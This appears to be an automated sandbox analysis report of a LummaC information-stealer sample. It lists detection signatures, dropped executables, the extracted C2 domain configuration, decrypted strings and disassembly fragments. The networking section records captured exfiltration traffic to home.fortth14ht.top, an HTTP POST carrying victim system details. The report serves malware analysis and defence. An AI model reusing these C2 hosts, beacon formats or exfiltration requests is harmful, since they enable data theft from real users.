Edit tour

Windows Analysis Report
8wiUGtm9UM.exe

Overview

General Information

Sample name:	8wiUGtm9UM.exe renamed because original name is a hash value
Original sample name:	a99adad8a9f9f1d9dcce30c42dd4be3a.exe
Analysis ID:	1581213
MD5:	a99adad8a9f9f1d9dcce30c42dd4be3a
SHA1:	62a01c957ca7d637a1d8090475c4ef2843100bb8
SHA256:	1ad8785caeb519b67ea168477437d8166d9747196a46d22313f48eb4ab86fec8
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Leaks process information

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

8wiUGtm9UM.exe (PID: 528 cmdline: "C:\Users\user\Desktop\8wiUGtm9UM.exe" MD5: A99ADAD8A9F9F1D9DCCE30C42DD4BE3A)

LummaC2.exe (PID: 3620 cmdline: "C:\Users\user\AppData\Local\Temp\LummaC2.exe" MD5: 607000C61FCB5A41B8D511B5ED7625D4)

Set-up.exe (PID: 5880 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["talkynicer.lat", "bashfulacid.lat", "censeractersj.click", "tentabatte.lat", "shapestickyr.lat", "wordyfindy.lat", "manyrestro.lat", "slipperyloo.lat", "curverpluch.lat"], "Build id": "Fppr10--Indus2"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.8wiUGtm9UM.exe.530000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x6d30d2:$s1: Runner 0x6d3237:$s3: RunOnStartup 0x6d30e6:$a1: Antis 0x6d3113:$a2: antiVM 0x6d311a:$a3: antiSandbox 0x6d3126:$a4: antiDebug 0x6d3130:$a5: antiEmulator 0x6d313d:$a6: enablePersistence 0x6d314f:$a7: enableFakeError 0x6d3260:$a8: DetectVirtualMachine 0x6d3285:$a9: DetectSandboxie 0x6d32b0:$a10: DetectDebugger 0x6d32bf:$a11: CheckEmulator

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 8wiUGtm9UM.exe

Avira: detected

Found malware configuration

Source: 00000002.00000002.3365277163.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["talkynicer.lat", "bashfulacid.lat", "censeractersj.click", "tentabatte.lat", "shapestickyr.lat", "wordyfindy.lat", "manyrestro.lat", "slipperyloo.lat", "curverpluch.lat"], "Build id": "Fppr10--Indus2"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: 8wiUGtm9UM.exe	Virustotal: Detection: 33%			Perma Link
Source: 8wiUGtm9UM.exe	ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 8wiUGtm9UM.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: bashfulacid.lat
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: tentabatte.lat
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: curverpluch.lat
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: talkynicer.lat
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: shapestickyr.lat
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: manyrestro.lat
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: slipperyloo.lat
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: wordyfindy.lat
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: censeractersj.click
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: Fppr10--Indus2

Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_ffe61e2e-e

Source: 8wiUGtm9UM.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_006EC59C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	2_2_006EEEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h	2_2_006EEEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_006DB078
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	2_2_006EF040
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h	2_2_006EF040
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	2_2_006EA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h	2_2_006EA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	2_2_006EA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_006EA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax]	2_2_006EB813
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then push esi	2_2_006D10F3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	2_2_006EE8D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_006D90B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-23ABFE5Bh]	2_2_006D90B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	2_2_006C8095
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	2_2_006DC894
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_006CD172
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp edx	2_2_006ED140
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	2_2_006DC9E9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	2_2_006DC9DA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+795224EFh]	2_2_006D59B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_006CD189
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	2_2_006DC984
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_006C4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov eax, ecx	2_2_006C4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ebp, dword ptr [esp+20h]	2_2_006C4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	2_2_006C4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	2_2_006C4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then and esi, 80000000h	2_2_006B8A20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+795224B5h]	2_2_006D6230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov esi, edx	2_2_006C720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+65F916CFh]	2_2_006C720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_006C92C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+273D8904h]	2_2_006EDAA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-15B7625Fh]	2_2_006D8290
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+418B67A0h]	2_2_006BD35C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 9164D103h	2_2_006EDBB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax]	2_2_006EB46A
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	2_2_006CCC60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_006B7440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	2_2_006B7440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], E7E6E5E6h	2_2_006EBC14
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_006EBC14
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, ecx	2_2_006CD560
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov esi, eax	2_2_006C6D52
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebp]	2_2_006E7D00
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_006D9DA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, ecx	2_2_006BEDB4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	2_2_006BEDB4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_006CAD81
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, dword ptr [esp+54h]	2_2_006D8640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	2_2_006EBCDB
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	2_2_006C46C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_006D66C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp edx	2_2_006D26D3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_006DBF45
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp eax	2_2_006D3FF1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, dword ptr [esp+30h]	2_2_006D3FF1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], 4B1BF3DAh	2_2_006E7790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then push dword ptr [esp+04h]	2_2_006E7790

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: censeractersj.click
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: curverpluch.lat

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 471607Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 34 36 30 34 36 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View	IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View	IP Address: 34.226.108.155 34.226.108.155

Source: Joe Sandbox View

ASN Name: REDSERVICIOES REDSERVICIOES

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fortth14ht.top

Source: unknown

HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 471607Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 34 36 30 34 36 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:40:51 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
